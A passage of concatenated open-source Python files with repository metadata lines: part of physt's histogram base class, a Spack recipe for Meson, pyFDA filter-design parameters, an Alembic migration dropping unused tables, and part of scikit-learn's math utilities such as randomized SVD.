axis = self._get_axis(axis)
if amount is not None:
if not amount == int(amount):
raise ValueError(f"Amount must be integer, {amount} found.")
bin_map = [(i, i // amount) for i in range(self.shape[axis])]
elif min_frequency is not None:
if self.ndim == 1:
check = self.frequencies
else:
# TODO: Check this!
from physt.histogram_nd import HistogramND
check = cast(HistogramND, self).projection(axis).frequencies
bin_map = []
current_new = 0
current_sum = 0
for i, freq in enumerate(check):
if freq >= min_frequency and current_sum > 0:
current_sum = 0
current_new += 1
bin_map.append((i, current_new))
current_sum += freq
if current_sum > min_frequency:
current_sum = 0
current_new += 1
else:
raise NotImplementedError("Not yet implemented.")
new_binning = self._binnings[axis].apply_bin_map(bin_map)
self._change_binning(new_binning, bin_map, axis=axis)
return self
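    # Usage sketch (illustrative):
    #
    #     coarser = hist.merge_bins(2)                       # join bin pairs
    #     dense = hist.merge_bins(min_frequency=10, axis=0)  # aim for >= 10 per bin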
def _reshape_data(self, new_size: int, bin_map, axis: int = 0):
"""Reshape data to match new binning schema.
Fills frequencies and errors with 0.
Parameters
----------
new_size: New size along the axis
bin_map: Iterable[(old, new)] or int or None
If None, we can keep the data unchanged.
            If int, it is the offset by which to shift the data (can be 0)
If iterable, pairs specify which old bin should go into which new bin
axis: On which axis to apply
"""
if bin_map is None:
return
new_shape = list(self.shape)
new_shape[axis] = new_size
new_frequencies = np.zeros(new_shape, dtype=self._frequencies.dtype)
new_errors2 = np.zeros(new_shape, dtype=self._frequencies.dtype)
self._apply_bin_map(
old_frequencies=self._frequencies,
new_frequencies=new_frequencies,
old_errors2=self._errors2,
new_errors2=new_errors2,
bin_map=bin_map,
axis=axis,
)
self._frequencies = new_frequencies
self._errors2 = new_errors2
def _apply_bin_map(
self,
old_frequencies: np.ndarray,
new_frequencies: np.ndarray,
old_errors2: np.ndarray,
new_errors2: np.ndarray,
bin_map: Union[Iterable[Tuple[int, int]], int],
axis: int,
):
"""Fill new data arrays using a map.
Parameters
----------
old_frequencies : Source of frequencies data
new_frequencies : Target of frequencies data
old_errors2 : Source of errors data
new_errors2 : Target of errors data
bin_map: Iterable[(old, new)] or int or None
As in _reshape_data
axis: On which axis to apply
See also
--------
HistogramBase._reshape_data
"""
if old_frequencies is not None and old_frequencies.shape[axis] > 0:
if isinstance(bin_map, int):
new_index: List[Union[int, slice]] = [slice(None) for i in range(self.ndim)]
new_index[axis] = slice(bin_map, bin_map + old_frequencies.shape[axis])
new_frequencies[tuple(new_index)] += old_frequencies
new_errors2[tuple(new_index)] += old_errors2
else:
for (old, new) in bin_map: # Generic enough
new_index = [slice(None) for i in range(self.ndim)]
new_index[axis] = new
old_index: List[Union[int, slice]] = [slice(None) for i in range(self.ndim)]
old_index[axis] = old
new_frequencies[tuple(new_index)] += old_frequencies[tuple(old_index)]
new_errors2[tuple(new_index)] += old_errors2[tuple(old_index)]
def has_same_bins(self, other: "HistogramBase") -> bool:
"""Whether two histograms share the same binning."""
if self.shape != other.shape:
return False
elif self.ndim == 1:
return np.allclose(self.bins, other.bins)
for i in range(self.ndim):
if not np.allclose(self.bins[i], other.bins[i]):
return False
return True
def copy(self: "HistogramType", *, include_frequencies: bool = True) -> "HistogramType":
"""Copy the histogram.
Parameters
----------
include_frequencies : If false, all frequencies are set to zero.
"""
if include_frequencies:
frequencies = np.copy(self.frequencies)
missed = self._missed.copy()
errors2 = np.copy(self.errors2)
else:
frequencies = np.zeros_like(self._frequencies)
errors2 = np.zeros_like(self._errors2)
missed = np.zeros_like(self._missed)
a_copy = self.__class__.__new__(self.__class__)
a_copy._binnings = [binning.copy() for binning in self._binnings]
a_copy._dtype = self.dtype
a_copy._frequencies = frequencies
a_copy._errors2 = errors2
a_copy._meta_data = self._meta_data.copy()
a_copy.keep_missed = self.keep_missed
a_copy._missed = missed
return a_copy
@abc.abstractmethod
def select(self, axis: Axis, index: Union[int, slice], *, force_copy: bool = False) -> Any:
"""Select in an axis.
Parameters
----------
axis: Axis, in which we select.
index: Index of bin (as in numpy).
force_copy: If True, identity slice force a copy to be made.
"""
@property
def binnings(self) -> List[BinningBase]:
"""The binnings.
Note: Please, do not try to update the objects themselves.
"""
return self._binnings
@property
@abc.abstractmethod
def bins(self):
...
@abc.abstractmethod
def fill(self, value: float, weight: float = 1, **kwargs) -> Union[None, int, Tuple[int, ...]]:
"""Update histogram with a new value.
It is an in-place operation.
Parameters
----------
value: Value to be added. Can be scalar or array depending on the histogram type.
weight: Weight of the value
Note
----
May change the dtype if weight is set
"""
# TODO: Perhaps it should just return None?
...
@abc.abstractmethod
def fill_n(
self, values: ArrayLike, weights: Optional[ArrayLike] = None, *, dropna: bool = True
):
"""Update histogram with more values at once.
It is an in-place operation.
Parameters
----------
values: Values to add
weights: Optional weights to assign to each value
        dropna: If True (default), all NaNs are skipped.
Note
----
This method should be overloaded with a more efficient one.
May change the dtype if weight is set.
"""
...
@property
def plot(self) -> "physt.plotting.PlottingProxy":
"""Proxy to plotting.
This attribute is a special proxy to plotting. In the most
simple cases, it can be used as a method. For more sophisticated
use, see the documentation for physt.plotting package.
"""
from .plotting import PlottingProxy
return PlottingProxy(self)
def to_dict(self) -> Dict[str, Any]:
"""Dictionary with all data in the histogram.
This is used for export into various formats (e.g. JSON)
If a descendant class needs to update the dictionary in some way
(put some more information), override the _update_dict method.
"""
result: Dict[str, Any] = dict()
result["histogram_type"] = type(self).__name__
result["binnings"] = [binning.to_dict() for binning in self._binnings]
if self.frequencies is not None:
result["frequencies"] = self.frequencies.tolist()
else:
result["frequencies"] = None
result["dtype"] = str(np.dtype(self.dtype))
# TODO: Optimize for _errors == _frequencies
result["errors2"] = self.errors2.tolist()
result["meta_data"] = self._meta_data
result["missed"] = self._missed.tolist()
result["missed_keep"] = self.keep_missed
self._update_dict(result)
return result
def _update_dict(self, a_dict: Dict[str, Any]) -> None:
"""Update the dictionary for export.
Override if you want to customize the process.
Parameters
----------
a_dict : Dictionary exported by the default implementation of to_dict
"""
pass
@classmethod
def _kwargs_from_dict(cls, a_dict: Mapping[str, Any]) -> Dict[str, Any]:
"""Modify __init__ arguments from an external dictionary.
Template method for from dict.
Override if necessary (like it's done in Histogram1D).
"""
kwargs: Dict[str, Any] = {
"binnings": [
BinningBase.from_dict(binning_data) for binning_data in a_dict["binnings"]
],
"dtype": np.dtype(a_dict["dtype"]),
"frequencies": a_dict.get("frequencies"),
"errors2": a_dict.get("errors2"),
}
if "missed" in a_dict:
kwargs["missed"] = a_dict["missed"]
kwargs.update(a_dict.get("meta_data", {}))
if len(kwargs["binnings"]) > 2:
kwargs["dimension"] = len(kwargs["binnings"])
return kwargs
@classmethod
def from_dict(cls, a_dict: Mapping[str, Any]) -> "HistogramBase":
"""Create an instance from a dictionary.
If customization is necessary, override the _from_dict_kwargs
template method, not this one.
"""
kwargs = cls._kwargs_from_dict(a_dict)
return cls(**kwargs)
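    # Round-trip sketch (illustrative): to_dict and from_dict are inverses for
    # the numerical payload, and to_dict also backs the JSON export below:
    #
    #     clone = type(hist).from_dict(hist.to_dict())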
def to_json(self, path: Optional[str] = None, **kwargs) -> str:
"""Convert to JSON representation.
Parameters
----------
path: Where to write the JSON.
Returns
-------
The JSON representation.
"""
from .io import save_json
return save_json(self, path, **kwargs)
def __repr__(self):
if self.name:
return f"{self.__class__.__name__}('{self.name}', bins={self.shape}, total={self.total}, dtype={self.dtype})"
return (
f"{self.__class__.__name__}(bins={self.shape}, total={self.total}, dtype={self.dtype})"
)
def __add__(self, other):
new = self.copy()
new += other
if isinstance(other, HistogramBase):
new._meta_data = self._merge_meta_data(self, other)
return new
def __radd__(self, other):
if other == 0: # Enable sum()
return self
return self + other
def __iadd__(self, other):
if isinstance(other, HistogramBase):
if other.ndim != self.ndim:
raise ValueError("Cannot add histograms with different dimensions.")
if self.has_same_bins(other):
self._coerce_dtype(other.dtype)
self.frequencies = self.frequencies + other.frequencies
self.errors2 = self.errors2 + other.errors2
self._missed += other._missed
elif self.is_adaptive():
if other.missed > 0:
raise ValueError("Cannot adapt histogram with missed values.")
other = other.copy()
other.set_adaptive(True)
self._coerce_dtype(other.dtype)
for i in range(self.ndim):
new_bins = self._binnings[i].copy()
map1, map2 = new_bins.adapt(other._binnings[i])
self._change_binning(new_bins, map1, axis=i)
other._change_binning(new_bins, map2, axis=i)
self.frequencies = self.frequencies + other.frequencies
self.errors2 = self.errors2 + other.errors2
else:
raise ValueError("Incompatible binning")
if hasattr(self, "_stats") and hasattr(other, "_stats"):
self._stats += other._stats
elif config.free_arithmetics:
array = np.asarray(other)
self._coerce_dtype(array.dtype)
self.frequencies = self.frequencies + array
self.errors2 = self.errors2 + abs(array)
self._missed = self._missed * np.nan # TODO: Any reasonable interpretation?
self._stats = INVALID_STATISTICS
else:
raise TypeError(f"Only histograms can be added together. {type(other)} found instead.")
return self
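    # Sketch (illustrative): when the binnings differ but self is adaptive,
    # += first adapts both operands to a shared binning and then adds:
    #
    #     a.set_adaptive(True)
    #     a += b          # b's bin edges are merged into a's binning first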
def __sub__(self, other):
new = self.copy()
new -= other
if isinstance(other, HistogramBase):
new._meta_data = self._merge_meta_data(self, other)
return new
def __isub__(self, other):
warnings.warn("Subtracting histograms is considered to be a bad idea.")
if isinstance(other, HistogramBase):
if config.free_arithmetics:
self += other * (-1)
else:
adapted_self = self + 0 * other
adapted_other = 0 * self + other
self.frequencies = adapted_self.frequencies - adapted_other.frequencies
self.errors2 = adapted_self.errors2 + adapted_other.errors2
self._missed -= other._missed
self._stats = INVALID_STATISTICS
return self
array = np.asarray(other)
return self.__iadd__(array * (-1))
def __mul__(self, other: Any):
new = self.copy()
new *= other
return new
def __imul__(self, other: Any):
if isinstance(other, HistogramBase):
raise TypeError("Multiplication of two histograms is not supported.")
if np.isscalar(other):
array = np.asarray(other)
scalar = cast(float, other)
try:
self._coerce_dtype(array.dtype)
except ValueError as v:
raise TypeError(str(v)) from v
self.frequencies = self.frequencies * scalar
self.errors2 = self.errors2 * scalar ** 2
self._missed = self._missed * scalar
if hasattr(self, "_stats"):
self._stats = self._stats * scalar
elif config.free_arithmetics: # Treat other as array-like
array = np.asarray(other)
self._coerce_dtype(array.dtype)
self.frequencies = self.frequencies * array
self.errors2 = self.errors2 * array ** 2
if hasattr(self, "_stats"):
self._stats = INVALID_STATISTICS
self._missed = self._missed * np.nan
else:
raise TypeError("Histograms may be multiplied only by a constant.")
return self
def __rmul__(self, other):
return self * other
def __truediv__(self, other):
new = self.copy()
new /= other
return new
def __itruediv__(self, other):
if isinstance(other, HistogramBase):
raise TypeError("Division of two histograms is not supported.")
elif np.isscalar(other):
self._coerce_dtype(np.float64)
self.frequencies = self.frequencies / other
self.errors2 = self.errors2 / other ** 2
self._missed /= other
if hasattr(self, "_stats"):
self._stats *= 1 / other
elif config.free_arithmetics: # Treat other as array-like
self._coerce_dtype(np.float64)
array = np.asarray(other)
self.frequencies = self.frequencies / array
self.errors2 = self.errors2 / array ** 2
if hasattr(self, "_stats"):
self._stats = INVALID_STATISTICS
self._missed /= np.nan
else:
raise TypeError("Histograms may be divided only by a constant.")
return self
def __lshift__(self, value):
"""Convenience alias for fill.
Because of the limit to argument count, weight is not supported.
"""
self.fill(value)
@classmethod
def _merge_meta_data(cls, first: "HistogramBase", second: "HistogramBase") -> dict:
"""Merge meta data of two histograms leaving only the equal values.
(Used in addition and subtraction)
"""
keys = set(first._meta_data.keys())
keys = keys.union(set(second._meta_data.keys()))
return {
key: (
first._meta_data.get(key, None)
if first._meta_data.get(key, None) == second._meta_data.get(key, None)
else None
)
for key in keys
}
def __array__(self) -> np.ndarray:
"""Convert to numpy array.
Returns
-------
The array of frequencies
See also
--------
frequencies
"""
return self.frequencies
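if __name__ == "__main__":
    # Illustrative sketch (assumes physt is installed and that the h1 factory
    # accepts this binning spec): HistogramBase is abstract, so the shared
    # behaviour is exercised through a concrete Histogram1D.
    import numpy as np
    from physt import h1

    hist = h1(np.random.normal(size=1000), "fixed_width", bin_width=0.5)
    print(hist.total)                  # ~1000 (unit weights)
    print(hist.normalize().total)      # ~1.0; normalize() returns a copy
    combined = hist + hist             # same bins => frequencies add
    print(combined.total == 2 * hist.total)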
| janpipek/physt | physt/histogram_base.py | Python | mit | 34,929 |
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Meson(PythonPackage):
"""Meson is a portable open source build system meant to be both
extremely fast, and as user friendly as possible."""
homepage = "https://mesonbuild.com/"
url = "https://github.com/mesonbuild/meson/archive/0.49.0.tar.gz"
maintainers = ['michaelkuhn']
version('0.60.0', sha256='5672a560fc4094c88ca5b8be0487e099fe84357e5045f5aecf1113084800e6fd')
version('0.59.2', sha256='e6d5ccd503d41f938f6cfc4dc9e7326ffe28acabe091b1ff0c6535bdf09732dd')
version('0.59.1', sha256='f256eb15329a6064f8cc1f23b29de1fa8d21e324f939041e1a4efe77cf1362ef')
version('0.59.0', sha256='fdbbe8ea8a47f9e21cf4f578f85be8ec3d9c030df3d8cb17df1ae59d8683813a')
version('0.58.2', sha256='58115604dea9c1f70811578df3c210f4d67cf795d21a4418f6e9bb35406953f5')
version('0.58.1', sha256='78e0f553dd3bc632d5f96ab943b1bbccb599c2c84ff27c5fb7f7fff9c8a3f6b4')
version('0.58.0', sha256='991b882bfe4d37acc23c064a29ca209458764a580d52f044f3d50055a132bed4')
version('0.57.2', sha256='cd3773625253df4fd1c380faf03ffae3d02198d6301e7c8bc7bba6c66af66096')
version('0.57.1', sha256='0c043c9b5350e9087cd4f6becf6c0d10b1d618ca3f919e0dcca2cdf342360d5d')
version('0.57.0', sha256='fd26a27c1a509240c668ebd29d280649d9239cf8684ead51d5cb499d1e1188bd')
version('0.56.2', sha256='aaae961c3413033789248ffe6762589e80b6cf487c334d0b808e31a32c48f35f')
version('0.56.0', sha256='a9ca7adf66dc69fbb7e583f7c7aef16b9fe56ec2874a3d58747e69a3affdf300')
version('0.55.3', sha256='2b276df50c5b13ccdbfb14d3333141e9e7985aca31b60400b3f3e0be2ee6897e')
version('0.55.2', sha256='56244896e56c2b619f819d047b6de412ecc5250975ee8717f1e329113d178e06')
version('0.55.1', sha256='c7ebf2fff5934a974c7edd1aebb5fc9c3e1da5ae3184a29581fde917638eea39')
version('0.55.0', sha256='9034c943c8cf4d734c0e18e5ba038dd762fcdcc614c45b41703305da8382e90c')
version('0.54.3', sha256='c25caff342b5368bfe33fab6108f454fcf12e2f2cef70817205872ddef669e8b')
version('0.54.2', sha256='85cafdc70ae7d1d9d506e7356b917c649c4df2077bd6a0382db37648aa4ecbdb')
version('0.54.1', sha256='854e8b94ab36e5aece813d2b2aee8a639bd52201dfea50890722ac9128e2f59e')
version('0.54.0', sha256='95efdbaa7cb3e915ab9a7b26b1412475398fdc3e834842a780f1646c7764f2d9')
version('0.53.2', sha256='eab4f5d5dde12d002b7ddd958a9a0658589b63622b6cea2715e0235b95917888')
version('0.49.1', sha256='a944e7f25a2bc8e4ba3502ab5835d8a8b8f2530415c9d6fcffb53e0abaea2ced')
version('0.49.0', sha256='11bc959e7173e714e4a4e85dd2bd9d0149b0a51c8ba82d5f44cc63735f603c74')
version('0.42.0', sha256='6c318a2da3859326a37f8a380e3c50e97aaabff6990067218dffffea674ed76f')
version('0.41.2', sha256='2daf448d3f2479d60e30617451f09bf02d26304dd1bd12ee1de936a53e42c7a4')
version('0.41.1', sha256='a48901f02ffeb9ff5cf5361d71b1fca202f9cd72998043ad011fc5de0294cf8b')
depends_on('python@3.6:', when='@0.57.0:', type=('build', 'run'))
depends_on('python@3.5:', type=('build', 'run'))
depends_on('py-setuptools', type=('build', 'run'))
depends_on('ninja', type='run')
# By default, Meson strips the rpath on installation. This patch disables
# rpath modification completely to make sure that Spack's rpath changes
# are not reverted.
patch('rpath-0.49.patch', when='@0.49:0.53')
patch('rpath-0.54.patch', when='@0.54:0.55')
patch('rpath-0.56.patch', when='@0.56:0.57')
patch('rpath-0.58.patch', when='@0.58:')
executables = ['^meson$']
@classmethod
def determine_version(cls, exe):
return Executable(exe)('--version', output=str, error=str).rstrip()
def setup_dependent_build_environment(self, env, dependent_spec):
# https://github.com/pybind/pybind11/issues/595
if self.spec.satisfies('platform=darwin'):
env.set('STRIP', 'strip -x')
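    # Usage sketch (illustrative), once this package file is on a Spack repo
    # path:
    #
    #     $ spack install meson@0.60.0
    #     $ spack external find meson   # uses `executables` + determine_version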
| LLNL/spack | var/spack/repos/builtin/packages/meson/package.py | Python | lgpl-2.1 | 4,020 |
# -*- coding: utf-8 -*-
"""
Common design parameters for minimum order design methods
@author: Christian Muenker
"""
from __future__ import print_function, division, unicode_literals
#from importlib import import_module
#import filterbroker as fb
class min_order_common(object):
def __init__(self):
self.name = {'common':'Common filter params'}
# message for min. filter order response types:
msg_min = ("Enter the maximum pass band ripple, minimum stop band "
"attenuation and the corresponding corner frequencies.")
# VISIBLE widgets for all man. / min. filter order response types:
vis_min = ['fo','fspecs','aspecs'] # minimum filter order
# ENABLED widgets for all man. / min. filter order response types:
enb_min = ['fo','fspecs','aspecs'] # minimum filter order
# common parameters for all man. / min. filter order response types:
par_min = ['f_S', 'A_PB', 'A_SB'] # enabled widget for min. filt. order
# Common data for all man. / min. filter order response types:
# This data is merged with the entries for individual response types
# (common data comes first):
self.com = {"min":{"enb":enb_min, "msg":msg_min, "par": par_min}}
self.rt = {
"LP": {"min":{"par":['f_S','A_PB','A_SB','F_PB','F_SB']}},
"HP": {"min":{"par":['f_S','A_PB','A_SB','F_SB','F_PB']}},
"BP": {"min":{"par":['f_S','A_PB','A_SB','A_SB2',
'F_SB','F_PB','F_PB2','F_SB2']}},
"BS": {"min":{"par":['f_S','A_PB','A_SB','A_PB2',
'F_PB','F_SB','F_SB2','F_PB2']}}
# "HIL": {"man":{"par":['F_SB', 'F_PB', 'F_PB2', 'F_SB2','A_SB','A_PB','A_SB2']}}
#"DIFF":
}
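        # Usage sketch (illustrative): downstream filter design code reads
        # these dicts, merging the common "min" entries with the per-response
        # type ones (common data first):
        #
        #     c = min_order_common()
        #     c.com["min"]["par"]       # ['f_S', 'A_PB', 'A_SB']
        #     c.rt["LP"]["min"]["par"]  # ['f_S', 'A_PB', 'A_SB', 'F_PB', 'F_SB']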
| honahursey/pyFDA | work/min_order_common.py | Python | apache-2.0 | 1,902 |
"""Remove unused models
Revision ID: 3f289637f530
Revises: 4ba1dd8c3080
Create Date: 2014-04-17 11:08:50.963964
"""
# revision identifiers, used by Alembic.
revision = '3f289637f530'
down_revision = '4ba1dd8c3080'
from alembic import op
def upgrade():
op.drop_table('aggtestgroup')
op.drop_table('testgroup_test')
op.drop_table('testgroup')
op.drop_table('aggtestsuite')
def downgrade():
raise NotImplementedError
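# Usage sketch (illustrative): applied through Alembic's CLI; downgrade is
# left unimplemented because the dropped tables cannot be reconstructed:
#
#     $ alembic upgrade 3f289637f530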
| bowlofstew/changes | migrations/versions/3f289637f530_remove_unused_models.py | Python | apache-2.0 | 442 |
"""
Extended math utilities.
"""
# Authors: Gael Varoquaux
# Alexandre Gramfort
# Alexandre T. Passos
# Olivier Grisel
# Lars Buitinck
# Stefan van der Walt
# Kyle Kastner
# Giorgio Patrini
# License: BSD 3 clause
from __future__ import division
from functools import partial
import warnings
import numpy as np
from scipy import linalg
from scipy.sparse import issparse, csr_matrix
from . import check_random_state
from .fixes import np_version
from ._logistic_sigmoid import _log_logistic_sigmoid
from ..externals.six.moves import xrange
from .sparsefuncs_fast import csr_row_norms
from .validation import check_array
from ..exceptions import NonBLASDotWarning
def norm(x):
"""Compute the Euclidean or Frobenius norm of x.
Returns the Euclidean norm when x is a vector, the Frobenius norm when x
is a matrix (2-d array). More precise than sqrt(squared_norm(x)).
"""
x = np.asarray(x)
nrm2, = linalg.get_blas_funcs(['nrm2'], [x])
return nrm2(x)
# Newer NumPy has a ravel that needs less copying.
if np_version < (1, 7, 1):
_ravel = np.ravel
else:
_ravel = partial(np.ravel, order='K')
def squared_norm(x):
"""Squared Euclidean or Frobenius norm of x.
Returns the Euclidean norm when x is a vector, the Frobenius norm when x
is a matrix (2-d array). Faster than norm(x) ** 2.
"""
x = _ravel(x)
return np.dot(x, x)
def row_norms(X, squared=False):
"""Row-wise (squared) Euclidean norm of X.
Equivalent to np.sqrt((X * X).sum(axis=1)), but also supports sparse
matrices and does not create an X.shape-sized temporary.
Performs no input validation.
"""
if issparse(X):
if not isinstance(X, csr_matrix):
X = csr_matrix(X)
norms = csr_row_norms(X)
else:
norms = np.einsum('ij,ij->i', X, X)
if not squared:
np.sqrt(norms, norms)
return norms
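# Usage sketch (illustrative): avoids the X.shape-sized temporary that
# np.sqrt((X * X).sum(axis=1)) would allocate, and accepts sparse input:
#
#     X = np.arange(6.).reshape(2, 3)
#     row_norms(X)                 # array([ 2.236...,  7.071...])
#     row_norms(X, squared=True)   # array([  5.,  50.])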
def fast_logdet(A):
"""Compute log(det(A)) for A symmetric
Equivalent to : np.log(nl.det(A)) but more robust.
It returns -Inf if det(A) is non positive or is not defined.
"""
sign, ld = np.linalg.slogdet(A)
if not sign > 0:
return -np.inf
return ld
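# Usage sketch (illustrative): agrees with np.log(np.linalg.det(A)) for a
# positive definite A, without overflowing in the determinant itself:
#
#     A = 2.0 * np.eye(3)
#     fast_logdet(A)   # 3 * log(2) ~= 2.079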
def _impose_f_order(X):
"""Helper Function"""
# important to access flags instead of calling np.isfortran,
# this catches corner cases.
if X.flags.c_contiguous:
return check_array(X.T, copy=False, order='F'), True
else:
return check_array(X, copy=False, order='F'), False
def _fast_dot(A, B):
if B.shape[0] != A.shape[A.ndim - 1]: # check adopted from '_dotblas.c'
raise ValueError
if A.dtype != B.dtype or any(x.dtype not in (np.float32, np.float64)
for x in [A, B]):
        warnings.warn('Falling back to np.dot. '
                      'Data must be of the same type and either '
                      '32 or 64 bit float for the BLAS function gemm to be '
                      'used for an efficient dot operation. ',
                      NonBLASDotWarning)
raise ValueError
if min(A.shape) == 1 or min(B.shape) == 1 or A.ndim != 2 or B.ndim != 2:
raise ValueError
# scipy 0.9 compliant API
dot = linalg.get_blas_funcs(['gemm'], (A, B))[0]
A, trans_a = _impose_f_order(A)
B, trans_b = _impose_f_order(B)
return dot(alpha=1.0, a=A, b=B, trans_a=trans_a, trans_b=trans_b)
def _have_blas_gemm():
try:
linalg.get_blas_funcs(['gemm'])
return True
except (AttributeError, ValueError):
warnings.warn('Could not import BLAS, falling back to np.dot')
return False
# Only use fast_dot for older NumPy; newer ones have tackled the speed issue.
if np_version < (1, 7, 2) and _have_blas_gemm():
def fast_dot(A, B):
"""Compute fast dot products directly calling BLAS.
This function calls BLAS directly while warranting Fortran contiguity.
This helps avoiding extra copies `np.dot` would have created.
For details see section `Linear Algebra on large Arrays`:
http://wiki.scipy.org/PerformanceTips
Parameters
----------
A, B: instance of np.ndarray
Input arrays. Arrays are supposed to be of the same dtype and to
have exactly 2 dimensions. Currently only floats are supported.
In case these requirements aren't met np.dot(A, B) is returned
instead. To activate the related warning issued in this case
execute the following lines of code:
>> import warnings
>> from sklearn.exceptions import NonBLASDotWarning
>> warnings.simplefilter('always', NonBLASDotWarning)
"""
try:
return _fast_dot(A, B)
except ValueError:
# Maltyped or malformed data.
return np.dot(A, B)
else:
fast_dot = np.dot
def density(w, **kwargs):
"""Compute density of a sparse vector
Return a value between 0 and 1
"""
if hasattr(w, "toarray"):
d = float(w.nnz) / (w.shape[0] * w.shape[1])
else:
d = 0 if w is None else float((w != 0).sum()) / w.size
return d
def safe_sparse_dot(a, b, dense_output=False):
"""Dot product that handle the sparse matrix case correctly
Uses BLAS GEMM as replacement for numpy.dot where possible
to avoid unnecessary copies.
"""
if issparse(a) or issparse(b):
ret = a * b
if dense_output and hasattr(ret, "toarray"):
ret = ret.toarray()
return ret
else:
return fast_dot(a, b)
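# Usage sketch (illustrative): handles any mix of dense and sparse operands;
# dense_output=True materializes a sparse result as an ndarray:
#
#     from scipy import sparse
#     A = sparse.rand(3, 4, density=0.5, format='csr')
#     B = np.ones((4, 2))
#     safe_sparse_dot(A, B, dense_output=True).shape   # (3, 2)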
def randomized_range_finder(A, size, n_iter,
power_iteration_normalizer='auto',
random_state=None):
"""Computes an orthonormal matrix whose range approximates the range of A.
Parameters
----------
A : 2D array
The input data matrix
size : integer
Size of the return array
n_iter : integer
Number of power iterations used to stabilize the result
power_iteration_normalizer : 'auto' (default), 'QR', 'LU', 'none'
Whether the power iterations are normalized with step-by-step
QR factorization (the slowest but most accurate), 'none'
(the fastest but numerically unstable when `n_iter` is large, e.g.
typically 5 or larger), or 'LU' factorization (numerically stable
but can lose slightly in accuracy). The 'auto' mode applies no
normalization if `n_iter`<=2 and switches to LU otherwise.
.. versionadded:: 0.18
random_state : RandomState or an int seed (0 by default)
A random number generator instance
Returns
-------
Q : 2D array
A (size x size) projection matrix, the range of which
approximates well the range of the input matrix A.
Notes
-----
Follows Algorithm 4.3 of
Finding structure with randomness: Stochastic algorithms for constructing
approximate matrix decompositions
    Halko, et al., 2009 (arXiv:0909.4061) http://arxiv.org/pdf/0909.4061
An implementation of a randomized algorithm for principal component
analysis
A. Szlam et al. 2014
"""
random_state = check_random_state(random_state)
# Generating normal random vectors with shape: (A.shape[1], size)
Q = random_state.normal(size=(A.shape[1], size))
# Deal with "auto" mode
if power_iteration_normalizer == 'auto':
if n_iter <= 2:
power_iteration_normalizer = 'none'
else:
power_iteration_normalizer = 'LU'
# Perform power iterations with Q to further 'imprint' the top
# singular vectors of A in Q
for i in range(n_iter):
if power_iteration_normalizer == 'none':
Q = safe_sparse_dot(A, Q)
Q = safe_sparse_dot(A.T, Q)
elif power_iteration_normalizer == 'LU':
Q, _ = linalg.lu(safe_sparse_dot(A, Q), permute_l=True)
Q, _ = linalg.lu(safe_sparse_dot(A.T, Q), permute_l=True)
elif power_iteration_normalizer == 'QR':
Q, _ = linalg.qr(safe_sparse_dot(A, Q), mode='economic')
Q, _ = linalg.qr(safe_sparse_dot(A.T, Q), mode='economic')
# Sample the range of A using by linear projection of Q
# Extract an orthonormal basis
Q, _ = linalg.qr(safe_sparse_dot(A, Q), mode='economic')
return Q
def randomized_svd(M, n_components, n_oversamples=10, n_iter='auto',
power_iteration_normalizer='auto', transpose='auto',
flip_sign=True, random_state=0):
"""Computes a truncated randomized SVD
Parameters
----------
M : ndarray or sparse matrix
Matrix to decompose
n_components : int
Number of singular values and vectors to extract.
n_oversamples : int (default is 10)
Additional number of random vectors to sample the range of M so as
to ensure proper conditioning. The total number of random vectors
used to find the range of M is n_components + n_oversamples. Smaller
number can improve speed but can negatively impact the quality of
approximation of singular vectors and singular values.
n_iter : int or 'auto' (default is 'auto')
Number of power iterations. It can be used to deal with very noisy
problems. When 'auto', it is set to 4, unless `n_components` is small
        (< .1 * min(X.shape)), in which case `n_iter` is set to 7.
This improves precision with few components.
.. versionchanged:: 0.18
power_iteration_normalizer : 'auto' (default), 'QR', 'LU', 'none'
Whether the power iterations are normalized with step-by-step
QR factorization (the slowest but most accurate), 'none'
(the fastest but numerically unstable when `n_iter` is large, e.g.
typically 5 or larger), or 'LU' factorization (numerically stable
but can lose slightly in accuracy). The 'auto' mode applies no
normalization if `n_iter`<=2 and switches to LU otherwise.
.. versionadded:: 0.18
transpose : True, False or 'auto' (default)
Whether the algorithm should be applied to M.T instead of M. The
result should approximately be the same. The 'auto' mode will
trigger the transposition if M.shape[1] > M.shape[0] since this
implementation of randomized SVD tend to be a little faster in that
case.
.. versionchanged:: 0.18
flip_sign : boolean, (True by default)
The output of a singular value decomposition is only unique up to a
permutation of the signs of the singular vectors. If `flip_sign` is
set to `True`, the sign ambiguity is resolved by making the largest
loadings for each component in the left singular vectors positive.
random_state : RandomState or an int seed (0 by default)
        A random number generator instance to make behavior deterministic.
Notes
-----
This algorithm finds a (usually very good) approximate truncated
singular value decomposition using randomization to speed up the
computations. It is particularly fast on large matrices on which
you wish to extract only a small number of components. In order to
obtain further speed up, `n_iter` can be set <=2 (at the cost of
loss of precision).
References
----------
* Finding structure with randomness: Stochastic algorithms for constructing
approximate matrix decompositions
      Halko, et al., 2009 http://arxiv.org/abs/0909.4061
* A randomized algorithm for the decomposition of matrices
Per-Gunnar Martinsson, Vladimir Rokhlin and Mark Tygert
* An implementation of a randomized algorithm for principal component
analysis
A. Szlam et al. 2014
"""
random_state = check_random_state(random_state)
n_random = n_components + n_oversamples
n_samples, n_features = M.shape
if n_iter == 'auto':
        # Checks if the number of iterations is explicitly specified
# Adjust n_iter. 7 was found a good compromise for PCA. See #5299
n_iter = 7 if n_components < .1 * min(M.shape) else 4
if transpose == 'auto':
transpose = n_samples < n_features
if transpose:
# this implementation is a bit faster with smaller shape[1]
M = M.T
Q = randomized_range_finder(M, n_random, n_iter,
power_iteration_normalizer, random_state)
# project M to the (k + p) dimensional space using the basis vectors
B = safe_sparse_dot(Q.T, M)
# compute the SVD on the thin matrix: (k + p) wide
Uhat, s, V = linalg.svd(B, full_matrices=False)
del B
U = np.dot(Q, Uhat)
if flip_sign:
if not transpose:
U, V = svd_flip(U, V)
else:
# In case of transpose u_based_decision=false
# to actually flip based on u and not v.
U, V = svd_flip(U, V, u_based_decision=False)
if transpose:
# transpose back the results according to the input convention
return V[:n_components, :].T, s[:n_components], U[:, :n_components].T
else:
return U[:, :n_components], s[:n_components], V[:n_components, :]
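# Usage sketch (illustrative): truncated SVD of a tall random matrix; the
# leading singular values closely match the exact ones from linalg.svd:
#
#     M = np.random.RandomState(0).randn(200, 50)
#     U, s, V = randomized_svd(M, n_components=5, random_state=0)
#     U.shape, s.shape, V.shape   # ((200, 5), (5,), (5, 50))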
def logsumexp(arr, axis=0):
"""Computes the sum of arr assuming arr is in the log domain.
